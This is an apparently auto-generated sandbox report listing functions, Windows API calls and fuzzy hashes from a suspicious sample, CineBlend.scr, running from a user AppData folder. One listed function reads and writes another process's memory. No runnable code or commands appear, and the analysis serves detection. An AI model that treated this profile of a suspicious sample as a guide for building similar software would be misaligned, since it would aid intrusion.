Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 07c9447aff9328b132a248d0b6bc8918f48fa2035a550cb30241353c149d9582
Instruction ID: 3b3acaf32c6dc17d740340b66dac6c38892b3881c4848879b411d4a90a8d60c7
Opcode Fuzzy Hash: 07c9447aff9328b132a248d0b6bc8918f48fa2035a550cb30241353c149d9582
Instruction Fuzzy Hash: F0217E759006199AEB209FA4CC84AEEFBF8EB15324F104297F925EB280E7709985CF50

Function 00BC138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00BC13AE
GetForegroundWindow.USER32 ref: 00BC13C5
GetDC.USER32(00000000), ref: 00BC1401
GetPixel.GDI32(00000000,?,00000003), ref: 00BC140D
ReleaseDC.USER32(00000000,00000003), ref: 00BC1445

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 101a8566a739a10b0adb2085dec8be57716ca68725c210484ac8e59c741a92d2
Instruction ID: 339f8802b02126017e34624707ba87eede6eb89f11b25036a6bc76b9e9b72f63
Opcode Fuzzy Hash: 101a8566a739a10b0adb2085dec8be57716ca68725c210484ac8e59c741a92d2
Instruction Fuzzy Hash: 81218135601204AFD704EF65CC94EAEBBF5EF89300B0484A9E89A97761DA70ED00DB90

Function 00B7D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B7D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B7D169

Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B7D18F
_free.LIBCMT ref: 00B7D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B7D1B1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a6528bda3ab506336eb5eda50b656e7cd46393971cb035987fd0c021205108d8
Instruction ID: b64b5be0cbb650324c9d6afde9a840545797832290e405df3490889d38571c86
Opcode Fuzzy Hash: a6528bda3ab506336eb5eda50b656e7cd46393971cb035987fd0c021205108d8
Instruction Fuzzy Hash: D201D4726066157F3321277A5C8CD7BABFDDEC2BE135481AAFC18E3240EE608C0181B0

Function 00BA6078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00BA608D
_memcmp.LIBVCRUNTIME ref: 00BA60AB
_memcmp.LIBVCRUNTIME ref: 00BA60BE
_memcmp.LIBVCRUNTIME ref: 00BA60D6
_memcmp.LIBVCRUNTIME ref: 00BA60EE

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c60146505ed326a23557b9e8d2c61a7ce575ff0a7960d0949283308fe927ea5b
Instruction ID: a3fccfaee9f19a7323282453d8a8c9c00545fb153d4fa79cf2e8e776445f2d87
Opcode Fuzzy Hash: c60146505ed326a23557b9e8d2c61a7ce575ff0a7960d0949283308fe927ea5b
Instruction Fuzzy Hash: D001F5E26083057BD32066255CC2FBB73DDDE22399B0808A1FD059A241E761ED90C2A0

Function 00BA08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?,?,00BA0C4E), ref: 00BA091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?), ref: 00BA0954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BA0831,80070057,?,?), ref: 00BA0960

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 666730022d259876919344d85cc4ec1dd0cca02d828b796b1a5091747267ccd6
Instruction ID: 96357a7bacce55e30043302a5ee381e7a35f8143d215a5d90986ee14e92f62bc
Opcode Fuzzy Hash: 666730022d259876919344d85cc4ec1dd0cca02d828b796b1a5091747267ccd6
Instruction Fuzzy Hash: FA01DF72615205AFEB015F58DC48B9BBBEDEB44751F104065F945E3211EB71DD009BA0

Function 00BAF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00BAF2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00BAF2BC
Sleep.KERNEL32(00000000), ref: 00BAF2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00BAF2CE
Sleep.KERNEL32 ref: 00BAF30A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 80986f13a45a20638b1185c03a94e38ae8f08c30896e9c740cd51289706ef80f
Instruction ID: f6574751e7fc7dba9c761cc6199f6013e04067f340b5c0e44be1dd389a3f45d5
Opcode Fuzzy Hash: 80986f13a45a20638b1185c03a94e38ae8f08c30896e9c740cd51289706ef80f
Instruction Fuzzy Hash: B5010975D0561AEBCF00AFE4EC59AEDBBB9FB0A701F0104A6E542B2250DB309554C7A5

Function 00BA1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA1A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA1A99

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: a269c3a797689c1685429932d3bfa74ec0d2111e115baf96f52578977b739ddc
Instruction ID: 176b879241b9020b62d076d6a49a693b88d227f8742c3f8cbd343b145cc4cb60
Opcode Fuzzy Hash: a269c3a797689c1685429932d3bfa74ec0d2111e115baf96f52578977b739ddc
Instruction Fuzzy Hash: 6A0181B5642605BFDB114F68DC58D6A7BADEF85364F210455F985D3260EE31DC408A60

Function 00BA1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA1916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA1922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA1931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BA1938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA194E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: e14817da2b8eb0081a6294a0884eb20df49c207fefa04583aa2b778f44dccc9b
Instruction ID: d510ad377f2890974e29bd632865bec538465c5c23f9cf49b47c52e393c681a8
Opcode Fuzzy Hash: e14817da2b8eb0081a6294a0884eb20df49c207fefa04583aa2b778f44dccc9b
Instruction Fuzzy Hash: 9CF04F75141312BBDB210F699C6DF577BADEF897A0F100415FA85D7250DE70DC01CA60

Function 00BA1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA1976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA19AE

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 578490124fbc6b1a59ca81638b6d2367e0a9d61ce92ecda6de48c947102d6ff3
Instruction ID: d07271b177ea2b383926ab1d3934dae0c35d566958829da0c0b251a8f1b13613
Opcode Fuzzy Hash: 578490124fbc6b1a59ca81638b6d2367e0a9d61ce92ecda6de48c947102d6ff3
Instruction Fuzzy Hash: 0DF0C275105311BBD7211F68EC68F577BADEF893A0F100411FA85D7250DE30D801CA60

Function 00BB0CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CCB
CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CD8
CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CE5
CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CF2
CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0CFF
CloseHandle.KERNEL32(?,?,?,?,00BB0B24,?,00BB3D41,?,00000001,00B83AF4,?), ref: 00BB0D0C

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5156387a58e3f9f35b0d804ad63d99cffbe268c81b25a2fa110f58effd0cf2a9
Instruction ID: f0587e911d0ff2f7ad0d1bd0e22917d51e35d18373b9dbe78d62788d6bee76ff
Opcode Fuzzy Hash: 5156387a58e3f9f35b0d804ad63d99cffbe268c81b25a2fa110f58effd0cf2a9
Instruction Fuzzy Hash: 6D01DC71800B05CFCB30AFA6D880867FBF9FE602153108A7ED09652931C7B0A848CE80

Function 00BA65AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00BA65BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00BA65D6
MessageBeep.USER32(00000000), ref: 00BA65EE
KillTimer.USER32(?,0000040A), ref: 00BA660A
EndDialog.USER32(?,00000001), ref: 00BA6624

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: b37ecf11e5b0901db22beb00d89f3a078ef1c08098f705d4347272152b334529
Instruction ID: 3c78bad8c921b6ca64234a5e829b994b6fe6ddb3cfb32d36fc97ce011191e5fe
Opcode Fuzzy Hash: b37ecf11e5b0901db22beb00d89f3a078ef1c08098f705d4347272152b334529
Instruction Fuzzy Hash: 8C018670945304ABEB205F24DD5EB96BBB8FF11705F04059AA5C6620E1EFF0AA448B90

Function 00B7DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B7DAD2

Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60

_free.LIBCMT ref: 00B7DAE4
_free.LIBCMT ref: 00B7DAF6
_free.LIBCMT ref: 00B7DB08
_free.LIBCMT ref: 00B7DB1A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0b26edbd1ad694aa5a7ace203afa030070b5c39ad05d78639b534943849870de
Instruction ID: 2c16d0b60a8774487e3b8c1a8718d2c123ef939b4e7eeb0b292e041e391328f2
Opcode Fuzzy Hash: 0b26edbd1ad694aa5a7ace203afa030070b5c39ad05d78639b534943849870de
Instruction Fuzzy Hash: 48F01232544214ABC624EB98E982E1A77EDFE047507968CD5F12ED7542CB30FC80C694

Function 00B72610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B7262E

Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60

_free.LIBCMT ref: 00B72640
_free.LIBCMT ref: 00B72653
_free.LIBCMT ref: 00B72664
_free.LIBCMT ref: 00B72675

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 69965357a629eea9fee7ed6258f407ce7f2af9c75de4999d777aef29661b6a31
Instruction ID: 00d4e4abf77ee976859584f248f9bd5bc4543df46dc25bbcd304b5b16985a0dc
Opcode Fuzzy Hash: 69965357a629eea9fee7ed6258f407ce7f2af9c75de4999d777aef29661b6a31
Instruction Fuzzy Hash: 0EF0D074402111DBC721AF94FC01B8C37A4FB26761706CAD7F429962B6C7354912EFC4

Function 00B41EB9 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00B41EC8
StrokeAndFillPath.GDI32(?,?,00B83294,00000000,?,?,?), ref: 00B41EE4
SelectObject.GDI32(?,00000000), ref: 00B41EF7
DeleteObject.GDI32 ref: 00B41F0A
StrokePath.GDI32(?), ref: 00B41F25

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 5191b97a0c85370bab51c7bbb67315d6351be09a14c2361cce32391600e0509e
Instruction ID: 08a044192cc6442a171f9a25de2946f3169b9f27dc7e09671d6310213e4ebc6a
Opcode Fuzzy Hash: 5191b97a0c85370bab51c7bbb67315d6351be09a14c2361cce32391600e0509e
Instruction Fuzzy Hash: 55F01938006204EBDB169F5CED19BA83BA5FB42332F04D259E469490F0DB3189A6EF10

Function 00B712B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00B71469
__freea.LIBCMT ref: 00B71487

Part of subcall function 00B718A7: _free.LIBCMT ref: 00B718BF

Strings

a/p, xrefs: 00B7154E
am/pm, xrefs: 00B714EA

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 568a8a9b490b6ef5aaec0662e73901de8684dba0003121753be56b0582cfbc0c
Instruction ID: 78eff17a4e49f191ed249e9346d7c81a64f50752d2532b391f577b28f7c7f848
Opcode Fuzzy Hash: 568a8a9b490b6ef5aaec0662e73901de8684dba0003121753be56b0582cfbc0c
Instruction Fuzzy Hash: 73D105759102069ACB289F6CC8957BAB7F5FF15700F28C9DAE52AAB250D335DD40CBB0

Function 00BA3063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BABDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA2B1D,?,?,00000034,00000800,?,00000034), ref: 00BABDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BA30AD

Part of subcall function 00BABD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA2B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00BABDBF

Part of subcall function 00BABCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00BABD1C
Part of subcall function 00BABCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BA2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00BABD2C
Part of subcall function 00BABCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BA2AE1,00000034,?,?,00001004,00000000,00000000), ref: 00BABD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA3167

Strings

@, xrefs: 00BA317F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 828222ef6b08234bb664796eaf79b68ed7aa6535dd202147cf6cf2722d082dc4
Instruction ID: 9960929bf1f614c1b5bcefa463b359143218eb28d108ecb27a8bf1b401279857
Opcode Fuzzy Hash: 828222ef6b08234bb664796eaf79b68ed7aa6535dd202147cf6cf2722d082dc4
Instruction Fuzzy Hash: F4411A72900218AEDB10DBA4CD81EDEBBF8EF46700F0040A5FA95B7181DA706F85DB60

Function 00B71A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr,00000104), ref: 00B71AD9
_free.LIBCMT ref: 00B71BA4
_free.LIBCMT ref: 00B71BAE

Strings

C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr, xrefs: 00B71AD0, 00B71AD7, 00B71B06, 00B71B3E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

